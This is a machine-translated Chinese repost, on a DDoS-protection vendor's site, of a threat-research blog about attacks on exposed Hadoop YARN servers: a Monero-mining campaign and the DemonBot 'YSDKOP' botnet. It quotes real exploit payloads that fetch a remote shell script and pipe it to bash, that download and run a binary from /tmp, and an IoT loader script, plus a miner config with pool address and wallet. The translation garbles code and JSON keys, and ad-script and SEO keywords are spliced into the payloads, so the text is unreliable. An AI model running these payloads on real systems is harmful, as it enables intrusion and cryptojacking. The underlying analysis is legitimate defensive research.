DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > DDOS防御 > 正文

ddos盾_cdn攻击防御_原理

05-02 DDOS防御

ddos盾_cdn攻击防御_原理

Hadoop纱线利用率正在放缓,但仍以每天35万个事件的速度增长1065服务器暴露且易受攻击易受攻击服务器和攻击目标的地理分布是全球性的,并且集中在云数据中心密度较高的地区这些攻击背后的动机从植入Linux后门、用IoT恶意软件感染服务器进行扫描和DDoS,到加密挖掘活动Monero加密挖掘活动自2018年4月以来一直在积极滥用暴露的Hadoop纱线服务器,挖掘的总收入为566 XMR(约60000美元),其收入正在以平均每天2 XMR(212美元)的速度增长在不到14天的时间里,从Hadoop YARN exploit中收集到的恶意软件足够建立一个小动物园hadoopyarn服务器的所有者应该小心,因为它们可能成为加密挖掘滥用的受害者,从而导致性能损失、不稳定性和更高的云利用率账单网上企业也应该关心。它们可能成为DDoS攻击的目标。消费者应该关心,因为如果他们最喜欢的网店成为DDoS攻击的受害者,他们将无法在网络星期一购物在我的DemonBot博客中,我讨论了hadoopyarn的攻击尝试是如何增加的。10月中旬,我们的欺骗网络每天记录到150万次尝试。好消息是,上个月下半月,尝试率稳步下降,但不幸的是,我们还没有到应该为揭露利用暴露的Hadoop YARN服务器的众多恶意活动之一而自责的地步。[你可能还喜欢:新发现的德蒙博特]最近几天,Hadoop Yarn漏洞攻击的尝试次数下降到平均每天35万次。也就是说,没有迹象表明威胁很快就会消失,我们应该保持警惕。为了了解风险并量化威胁,我从上一个博客开始就一直在跟踪Hadoop纱线活动,并探索攻击面的范围。了解滥用的可能性和暴露的服务器中出现的威胁类型,可以更好地了解风险。变量rnd=窗口.rnd|| 数学地板(数学随机()*10e6);var pid276005=窗口.pid276005||rnd;变量plc276005=窗口.plc276005||0;无功功率=窗口.abkw|| '';var absrc='https://servedbayadbutler.com/adserve/;ID=168379;size=0x0;setID=276005;type=js;sw='+屏幕宽度+';嘘='+屏幕高度+';spr='+窗口设备像素比率+';kw='+abkw+';pid='+pid276005+';位置='+(plc276005++)+';rnd='+rnd+';click=单击"宏"占位符';文档.写入('');袭击者和受害者从9月到11月上旬,我们的欺骗网络注册了超过3500万次利用漏洞的企图,其中超过三分之一来自美国。英国、意大利和德国是亚军,加起来,他们在一半以上的剥削尝试中表现良好。在绝对数字上,美国制造了将近1200万次的攻击尝试。英国和意大利各有600万次尝试,ddos攻击防御设置,紧随其后的是德国,有480万次。利用漏洞的企图并不是专门针对一个区域。与世界其他国家相比,英国和德国的蜜罐受到的打击是其他国家的两倍。每个地区的平均攻击次数在160万到320万次之间。Hadoop纱线攻击面为了评估攻击面,我对监听Hadoop YARN端口TCP/8088的服务进行了全局扫描,并注意排除了Robert Graham masscan排除列表中列出的敏感IP范围。截至11月8日,暴露在公众面前的易受攻击的Hadoop YARN服务器数量为1065个。易受攻击的服务器分布在全球各地,集中在数据中心密度较高的地区。将上述易受攻击的Hadoop YARN服务器的位置与以下全球数据中心地图进行比较:攻击面是全球性的,仅限于1000多台服务器,但它不应被忽视,因为强大的大数据服务器通常为恶意代理提供高潜力。虐待类型既然我们已经对攻击面有了一个很好的衡量标准,以及恶意行为体对它的兴趣,现在是时候仔细看看这些行为体是如何利用这种情况的。下图显示了我们的媒体交互蜜罐在14天内记录的不同Hadoop纱线利用率。每个漏洞有效载荷包含一个命令序列,该序列被散列成一个唯一的指纹,专业防御ddos,允许我们量化和跟踪一段时间内的活动。(*1)中的漏洞利用表包含与图中指纹对应的每个命令序列的详细信息。上面命令序列图中的红色条表示每天从新DemonBot活动"YSDKOP"中尝试的计数,该活动以恶意软件二进制文件的名称命名。这两个蓝色深浅的大山峰代表着与Hadoop纱线加密挖掘活动相关的多个漏洞,该活动已运行至少8个月;首次发现于2018年4月,最近将其下载基础设施迁移到BitBucket.org网站. 猜测使用Atlassian的免费和公共服务来跟踪cryptominer的不同版本及其配置文件会更方便…上面的命令序列图中显示的其他较短、攻击性较小的活动主要是Linux/IoT僵尸网络的感染尝试。下面讨论一些似乎值得几句话的话。比特桶加密矿工自今年4月以来,Monero一直在积极地滥用暴露在外的Hadoop YARN服务器,目前正在进行的一次加密挖掘活动总共开采了566 XMR(约60000美元),其收入正在以平均每天2 XMR(212美元)的速度增长。恶意代理或组当前正在滥用三台服务器,并且随着时间的推移,平均哈希率保持在400kH/s。利用Hadoop YARN漏洞,ddos备用防御,从公共BitBucket帐户下载并执行shell脚本:{"max app attempts":2,"am container spec":{"commands":{"command":"wget-q-O–https://bitbucket.org/zrundr42/mygit/raw/master/zz.sh|bash&disown"}",application id":"application_U0095〃,"application type":"YARN","application name":"hadoop"}的zz.sh公司'脚本,存档在(*2)中以供参考,在最终从同一存储库下载名为"x\u 64"的二进制文件之前,在服务器上执行一些清理。XY64二进制是XMRig,一个开源的,高性能的单CPU CPU,用C++编写。https://github.com/xmrig/xmrig).$/x_64—版本XMRig 2.8.1版建造于2018年10月18日,GCC 4.8.4特点:64位AESlibuv/1.9.1版XMRig的配置文件为"w.conf",从同一个位存储库下载:{"algo":"加密夜","背景":正确,"颜色":错误,"重试次数":5次,"重试暂停":5,"捐赠等级":1,"syslog":假,"日志文件":空,"60":打印时间,"av":0,"安全":错误,"最大cpu使用率":95,"cpu优先级":4,"线程":空,"池":[{"url":"地层+tcp://163.172.205.136:3333","user":"46cqwjteudgrf4aj733tmljmtzm8bogko1onesp1ufrap9rpgh6sfkfmae7v3jxpyvqi6dsfcqgbvymtab1dwydmukasg3s","pass":"h","keepalive":真的,"niceshash":错误,"变体":-1}],"api":{"端口":0,"访问令牌":空,"工人id":空}}从配置文件中,我们可以找到池钱包地址:46CQWJTEUDGRF4AJ733TMLJMTZM8BOGKO1NESP1UFRAP9RPGH6SFKFMA7V3JXPYVQ6DSFCQGBVYMTAB1DWYDMUKASG3钱包地址与Hadoop管理员今年5月在Stackoverflow和HortonWorks社区中报告的操作相匹配;数千个加密挖掘作业导致集群出现问题。今年8月,360威胁情报中心发表了一份关于他们所称的"8220采矿团伙"的报告,也提到了相同的钱包地址。据研究人员说,这个采矿团伙被怀疑是中国人。同样的地址也与Github上托管的另一个名为"Cpuhunter"的加密挖掘开源软件自述文件中的一个示例Nanopool报告链接中使用的钱包地址相匹配。从4月10日开始使用的Nanopool钱包账户可以通过这个链接进行追踪。截至11月12日,该非法采矿活动产生的XMR付款总额为566 XMR或约60000美元。国际奥委会二进制:A1BD663986BAE6B5CEA19616C9507D09618EADB71051AE826580A0B7E610E5 x U 64比特桶回购:https://bitbucket.org/zrundr42/mygit/src/master/采矿池账户:46CQWJTEUDGRF4AJ733TMLJMTZM8BOGKO1NESP1UFRAP9RPGH6SFKFMA7V3JXPYVQ6DSFCQGBVYMTAB1DWYDMUKASG3S伊斯克普,德蒙伯特藏起来了YSDKOP机器人通过Hadoop YARN漏洞使用以下有效负载交付:用户代理:[python requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64]{"am container spec":{"commands":{"command":"cd/tmp | | cd/var/run | | cd/mnt | cd/root | | cd/;wget;chmod+x/tmp/flex;/tmp/flex;rm-rf/tmp/flex"}",ddos攻击防御公司,application id:"application_1802197302061 U 0095",为什么要用高防cdn高防,"应用类型":"YARN","application name":"get shell"}下载的'垃圾箱.sh'脚本以典型的IoT加载程序的方式依次下载几个二进制文件:$猫垃圾箱.sh#!/垃圾桶/垃圾桶cd/tmp | | cd/var/run | | cd/mnt | | cd/root | | cd/;wget;chmod+xYSDKOP.mips文件; ./YSDKOP.mips文件;rm-射频YSDKOP.mips文件cd/tmp | | cd/var/run | | cd/mnt | | cd/root | | cd/;wget;chmod+xYSDKOP.mpsl公司; ./YSDKOP.mpsl公司;rm-射频YSDKOP.mpsl公司cd/tmp | | cd/var/run | | cd/mnt | | cd/root | | cd/;wget;x+chmod公司YSDKOP.sh4型; ./YSDKOP.sh4型;rm-射频YSDKOP.sh4型cd/tmp | |光盘

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://www.ddosgb.com/ddos1/50033.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 6767945访问次数
  • 建站天数

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X